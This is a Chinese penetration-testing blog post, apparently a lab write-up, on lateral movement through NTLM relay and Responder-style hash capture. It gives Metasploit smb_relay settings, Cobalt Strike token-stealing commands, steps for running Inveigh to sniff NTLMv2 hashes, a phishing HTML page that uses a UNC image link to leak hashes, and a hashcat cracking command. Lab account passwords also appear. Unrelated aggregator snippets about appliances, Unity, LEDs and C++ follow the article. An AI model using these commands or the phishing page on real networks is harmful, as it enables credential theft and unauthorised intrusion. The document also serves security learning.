内网渗透—横向移动NTLM-Relay重放攻击Responder中继攻击

2024-08-25 03:04

本文主要是介绍内网渗透—横向移动NTLM-Relay重放攻击Responder中继攻击,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

前言

与NLTM认证相关的安全问题主要有Pass The Hash、利用NTLM进行信息收集、Net-NTLM Hash破解、NTLM Relay几种。PTH前往期文章复现,运用mimikatz、impacket工具包的一些脚本、CS等等都可以利用,NTLM Relay又包括(relay to smb,ldap,ews)可以应用在获取不到明文或HASH时采用的手法,但也要注意手法的必备条件。

实验环境

实验环境没有固定的了,有时候自己搭建的环境可以,有时候又不行。有时候小迪的环境可以,有时候也不行,哎,随遇而安吧。

kali:192.168.145.171
Web:192.168.145.138,192.168.22.31
PC:192.168.22.27

NTLM-Relay重放

NTLM-Relay可以通过smb、ldap、ews协议进行重放,这里就通过smb协议来进行重放实验。我们通过smb协议去远程访问主机的话,它是会拿你当前的账号密码去进行一个匹对。比如A主机的账号密码是admin/passwd,而B主机的账号密码也是admin/passwd,那么A主机就可以直接远程访问B主机。这是smb的特性,也是Relay攻击的前置条件,就是通讯的双方账户与密码是一致。

案例测试

主机的账号密码。

PC1
本地账号密码: .\administraotr:3143237103Aa
域账号密码:god\wlwznb:3143237103AaPC2
本地账号密码: .\administraotr:3143237103Aa
域账号密码:god\wlwnb666:3143237103Aa

当前PC1账号是wlwznb,我们远程访问一下PC2试试,显示拒绝访问的。

此时我们把PC1的账号切换为administrator,成功访问PC2主机,这是因为PC2中存在administrator的账号,而且密码也一样。

重放攻击

这里我们就要用到msf中的smb Relay攻击模块啦,先让web服务器上线CS。

因为要使用到msf的模块,所以得把会话转到msf,CS设置监听器。

msf设置如下。

CS执行命令,即可转义会话。

spawn 2222

会话过来后我们再添加一下路由,因为33是内网网段。

run post/multi/manage/autoroute

查看一下路由。

run autoroute -p

使用smb重放模块。

background
use exploit/windows/smb/smb_relay

设置参数。

use exploit/windows/smb/smb_relay
set smbhost 192.168.22.27   #攻击目标
set lhost 192.168.145.171   #设置本地 IP
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp  ##设置正向连接
set rhost 192.168.22.27 #设置连接目标
run

到我们的受控主机执行远程访问命令。

dir \\192.168.145.171\c$

这里拓展一下,有人可能会说万一人家登录的用户不是administrator咋办。其实你可以到CS上面去切换用户滴,PS命令找到本地用户的administrator进程,记下PID。

输入命令切换用户。

steal_token 3792

查看当前用户为administrator。

getuid

然而却是没有成功,不知道为啥没成功,但是返回了hash值。网上很多文章都未成功,不过也有说64位系统未成功,但是32位系统成功了,这里我也懒得换小迪的环境测试了,就这样吧。

如果没搞懂的话,我放个图你们就明白了,这个图是我从别人文章找来的。

Responder中继攻击

这个攻击手段就是攻击者在被控主机上伪造一个SMB服务器,当内网中有机器对被控主机进行SMB访问的时候,内网中的主机先访问攻击者伪造的SMB服务器,然后伪造的SMB服务器再将访问流量重放给被控主机,在这个过程中,内网主机是毫无感觉的,但是内网主机访问的用户的账号与密码的hash值均被伪造的SMB服务器获取。

Inveigh嗅探

工具下载:Inveigh:.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers - GitCode

工具下载之后是源码,自己编译成exe,然后上传到Web主机。

直接运行这个exe,我这里图方便直接在Web主机上执行命令了。

Inveigh.exe

此时远程访问Web主机,可以看到hash会被记录在inveigh-NTLMv2这个文件。

可以制作一个钓鱼网站,诱骗域内用户点击,那么用户的hash机会被我们所记录。

<!DOCTYPE html>
<html>
<head><title></title>
</head>
<body><img src="file:///\\192.168.22.31">
</body>
</html>

hashcat破解

此时我们直接破解这个hash,这里使用hashcat这个工具去破解。

下载地址:https://github.com/hashcat/hashcat/

hashcat.exe -m 5600 1.txt pass.txt

总结

可以看到整个实验下来我是没有抓取hash或者密码的,但是仍可以成功横移的。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

这篇关于内网渗透—横向移动NTLM-Relay重放攻击Responder中继攻击的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1104359

相关文章

客户案例:安全海外中继助力知名家电企业化解海外通邮困境

1、客户背景 广东格兰仕集团有限公司(以下简称“格兰仕”),成立于1978年,是中国家电行业的领军企业之一。作为全球最大的微波炉生产基地,格兰仕拥有多项国际领先的家电制造技术,连续多年位列中国家电出口前列。格兰仕不仅注重业务的全球拓展,更重视业务流程的高效与顺畅,以确保在国际舞台上的竞争力。 2、需求痛点 随着格兰仕全球化战略的深入实施,其海外业务快速增长,电子邮件成为了关键的沟通工具。

我在移动打工的日志

客户:给我搞一下录音 我:不会。不在服务范围。 客户:是不想吧 我:笑嘻嘻(气笑) 客户:小姑娘明明会,却欺负老人 我:笑嘻嘻 客户:那我交话费 我:手机号 客户:给我搞录音 我:不会。不懂。没搞过。 客户:那我交话费 我:手机号。这是电信的啊!!我这是中国移动!! 客户:我不管,我要充话费,充话费是你们的 我:可是这是移动!!中国移动!! 客户:我这是手机号 我:那又如何,这是移动!你是电信!!

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网

用Unity2D制作一个人物,实现移动、跳起、人物静止和动起来时的动画:中(人物移动、跳起、静止动作)

上回我们学到创建一个地形和一个人物,今天我们实现一下人物实现移动和跳起,依次点击,我们准备创建一个C#文件 创建好我们点击进去,就会跳转到我们的Vision Studio,然后输入这些代码 using UnityEngine;public class Move : MonoBehaviour // 定义一个名为Move的类,继承自MonoBehaviour{private Rigidbo

简单的角色响应鼠标而移动

actor类 //处理移动距离,核心是找到角色坐标在世界坐标的向量的投影(x,y,z),然后在世界坐标中合成,此CC是在地面行走,所以Y轴投影始终置为0; using UnityEngine; using System.Collections; public class actor : MonoBehaviour { public float speed=0.1f; CharacterCo

物联网之流水LED灯、正常流水灯、反复流水灯、移动流水灯

MENU 硬件电路设计软件程序设计正常流水LED灯反复流水LED灯移动流水LED灯 硬件电路设计 材料名称数量直插式LED1kΩ电阻杜邦线(跳线)若干面包板1 每一个LED的正极与开发板一个GPIO引脚相连,并串联一个电阻,负极接GND。 当然也可以选择只使用一个电阻。 软件程序设计 正常流水LED灯 因为要用到多个GPIO引脚,所以最好把所有的GPI

12C 新特性,MOVE DATAFILE 在线移动 包括system, 附带改名 NID ,cdb_data_files视图坏了

ALTER DATABASE MOVE DATAFILE  可以改名 可以move file,全部一个命令。 resue 可以重用,keep好像不生效!!! system照移动不误-------- SQL> select file_name, status, online_status from dba_data_files where tablespace_name='SYSTEM'

《C++中的移动构造函数与移动赋值运算符:解锁高效编程的最佳实践》

在 C++的编程世界中,移动构造函数和移动赋值运算符是提升程序性能和效率的重要工具。理解并正确运用它们,可以让我们的代码更加高效、简洁和优雅。 一、引言 随着现代软件系统的日益复杂和对性能要求的不断提高,C++程序员需要不断探索新的技术和方法来优化代码。移动构造函数和移动赋值运算符的出现,为解决资源管理和性能优化问题提供了有力的手段。它们允许我们在不进行不必要的复制操作的情况下,高效地转移资源

创建一个大的DIV,里面的包含两个DIV是可以自由移动

创建一个大的DIV,里面的包含两个DIV是可以自由移动 <body>         <div style="position: relative; background:#DDF8CF;line-height: 50px"> <div style="text-align: center; width: 100%;padding-top: 0px;"><h3>定&nbsp;位&nbsp;

C# 通过拖控件移动窗体

目录 引言一、通过控件事件移动窗体1、创建窗体界面2、添加控件事件3、添加代码 二、通过windowsAPI移动窗体1、 构建窗体和添加事件2、代码展示 引言 在C#Form窗体设计中,如果我们不需要使用默认边框设计自己个性化的窗体(FromBorderStyle=none时),这时候你会发现拖动窗体的功能就没有了,这里需要自己构建方法让用户可以拖动整个窗体,这里我们使用前辈的